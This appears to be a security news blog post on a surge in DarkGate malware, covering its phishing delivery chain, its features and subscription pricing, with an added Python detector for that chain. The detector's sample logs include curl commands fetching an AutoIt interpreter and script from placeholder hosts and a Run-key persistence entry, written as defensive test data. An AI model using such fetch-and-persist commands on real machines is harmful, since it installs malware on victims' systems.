A surge in DarkGate malware activity has been detected – a development that aligns with recent actions of the malware’s developer who has begun leasing out the software to a select group of affiliates, according to a report by Telekom Security.
This uptick in DarkGate’s use builds upon the recent findings of security researcher Igal Lytzki, who reported a “high volume campaign” that uses hijacked email threads to trick users into downloading the malware.
The attack begins with a phishing URL. Once clicked, it navigates through a traffic direction system (TDS), which leads the victim to an MSI payload only under certain conditions, such as the presence of a refresh header in the HTTP response. Opening the MSI file initiates a multi-stage process involving an AutoIt script that executes shellcode, serving as a pathway to decrypt and launch DarkGate via a crypter (loader). The loader’s primary function is to parse the AutoIt script and extract the encrypted malware sample.
There have also been sightings of an alternate attack pattern that employs a VB (Visual Basic) Script instead of an MSI file. This variation uses cURL to retrieve the AutoIt executable and script file. However, the exact delivery method of the VB Script remains unclear.
DarkGate, primarily sold on underground forums by a user named RastaFarEye, boasts features designed to dodge detection by security software. It can establish persistence through modifications to the Windows Registry, escalate privileges, and pilfer data from web browsers and other software, including Discord and FileZilla. Most of these modifications can be caught by modern EDR / XDR solutions.
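The delivery chain described above (TDS refresh header to an MSI payload, cURL pulling down the AutoIt interpreter and script in the VB Script variant, and Run-key persistence) is the kind of thing an EDR or proxy rule set can be written against. The following is an added example, not code from the Telekom Security report or from this post: a small Python detector run over constructed log lines in an assumed `key=value` format. Hostnames, file paths, the value name and the log field names are all illustrative assumptions, not real indicators.

```python
"""Detection sketch for the DarkGate delivery chain described above.

Added example, not code from the Telekom Security report or this post.
It scans constructed log lines (an assumed "key=value" format from a web
proxy and an EDR process/registry sensor) for three stages the text
names: an HTTP Refresh header redirecting to an .msi payload, curl.exe
fetching an AutoIt interpreter or .au3 script (the VB Script variant), and
a Run-key write that points at AutoIt for persistence. Hostnames, paths
and value names are placeholders, not real indicators.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events; ".invalid" hosts cannot resolve on any network.
SAMPLE_LOGS = [
    'type=http host=example-tds.invalid status=200 resp_hdr="Refresh: 0; url=https://example-tds.invalid/drop/setup.msi"',
    'type=http host=cdn.example.invalid status=200 resp_hdr="Content-Type: text/html"',
    'type=process image=C:\\Windows\\System32\\msiexec.exe parent=C:\\Program Files\\Browser\\browser.exe cmd="msiexec /i setup.msi /qn"',
    'type=process image=C:\\Windows\\System32\\curl.exe parent=C:\\Windows\\System32\\wscript.exe cmd="curl -o C:\\Users\\Public\\AutoIt3.exe https://example-tds.invalid/a/AutoIt3.exe"',
    'type=process image=C:\\Windows\\System32\\curl.exe parent=C:\\Windows\\System32\\wscript.exe cmd="curl -o C:\\Users\\Public\\script.au3 https://example-tds.invalid/a/script.au3"',
    'type=registry op=SetValue key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run value=Updater data="C:\\Users\\Public\\AutoIt3.exe C:\\Users\\Public\\script.au3"',
    'type=process image=C:\\Windows\\System32\\curl.exe parent=C:\\Windows\\System32\\cmd.exe cmd="curl -O https://example.invalid/readme.txt"',
]

# key=value tokens; a value may be double-quoted so it can contain spaces.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Refresh header whose target ends in .msi (the TDS condition named in the text).
_MSI_REFRESH = re.compile(r'^Refresh:\s*\d+\s*;\s*url=\S+\.msi\b', re.IGNORECASE)
# Anything that names the AutoIt interpreter or an AutoIt script file.
_AUTOIT = re.compile(r'autoit|\.au3\b', re.IGNORECASE)
_SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}


def parse_line(line: str) -> Dict[str, str]:
    """Split a 'key=value' log line into a dict; quoted values lose their quotes."""
    return {key: quoted or bare for key, quoted, bare in _KV.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits: List[str] = []
    kind = ev.get('type')
    if kind == 'http':
        if _MSI_REFRESH.search(ev.get('resp_hdr', '')):
            hits.append('tds_refresh_to_msi')
    elif kind == 'process':
        image = basename(ev.get('image', ''))
        parent = basename(ev.get('parent', ''))
        if image == 'curl.exe':
            if _AUTOIT.search(ev.get('cmd', '')):
                hits.append('curl_fetches_autoit')
            if parent in _SCRIPT_HOSTS:
                hits.append('script_host_spawns_curl')
    elif kind == 'registry':
        run_key = '\\currentversion\\run' in ev.get('key', '').lower()
        if ev.get('op') == 'SetValue' and run_key and _AUTOIT.search(ev.get('data', '')):
            hits.append('run_key_autoit_persistence')
    return hits


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Run every rule over every line; returns (rule, line) pairs."""
    findings: List[Tuple[str, str]] = []
    for line in lines:
        for rule in check_event(parse_line(line)):
            findings.append((rule, line))
    return findings


def chain_stages(findings: List[Tuple[str, str]]) -> List[str]:
    """Distinct stages seen, so an analyst can tell a stray hit from a full chain."""
    return sorted({rule for rule, _ in findings})


if __name__ == '__main__':
    found = detect(SAMPLE_LOGS)
    for rule, line in found:
        print(f'[{rule}] {line}')
    print('stages observed:', chain_stages(found))
```

Each rule on its own is noisy (curl and Run-key writes are common in legitimate software), which is why `chain_stages` reports how many distinct stages appeared: several stages from one host in a short window is a far stronger signal than any single hit, and that correlation is what an EDR/XDR product is doing when it catches these modifications.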
The malware also sets up communication with a command-and-control (C2) server, which allows for file enumeration, data exfiltration, the launch of cryptocurrency miners, remote screenshot capture, and the execution of other commands. The malware is available on a subscription basis, with prices ranging from $1,000 per day to $15,000 per month, up to $100,000 a year.
Opinion: If you’re paying $100,000 per year for some piece of shit malware that isn’t going to work in a few months and is already on everyone’s radar, then you’re definitely dumber than the guy who wrote it and took your money.
The author promotes it as the “ultimate tool for pentesters/redteamers,” boasting of features that are unique to DarkGate.
Additional opinion: See? He is smart. It’s a “pentesting tool”, not a “do crimes app”.
Notably, earlier versions of DarkGate were equipped with a ransomware module. Phishing attacks remain a primary delivery method for stealers, trojans, and malware loaders such as KrakenKeylogger, QakBot, Raccoon Stealer, SmokeLoader, among others.
Threat actors continue to enhance and expand the functionality of these tools. A recent report by HP Wolf Security revealed that email is the most common vector for delivering malware to endpoints, accounting for 79% of threats identified in Q2 2023.
Final Thought: Maybe I sound like Jerry Maguire when I say this, but please stop trying to read email faster than everyone and ignoring who’s sending it to you. Clicking is a privilege.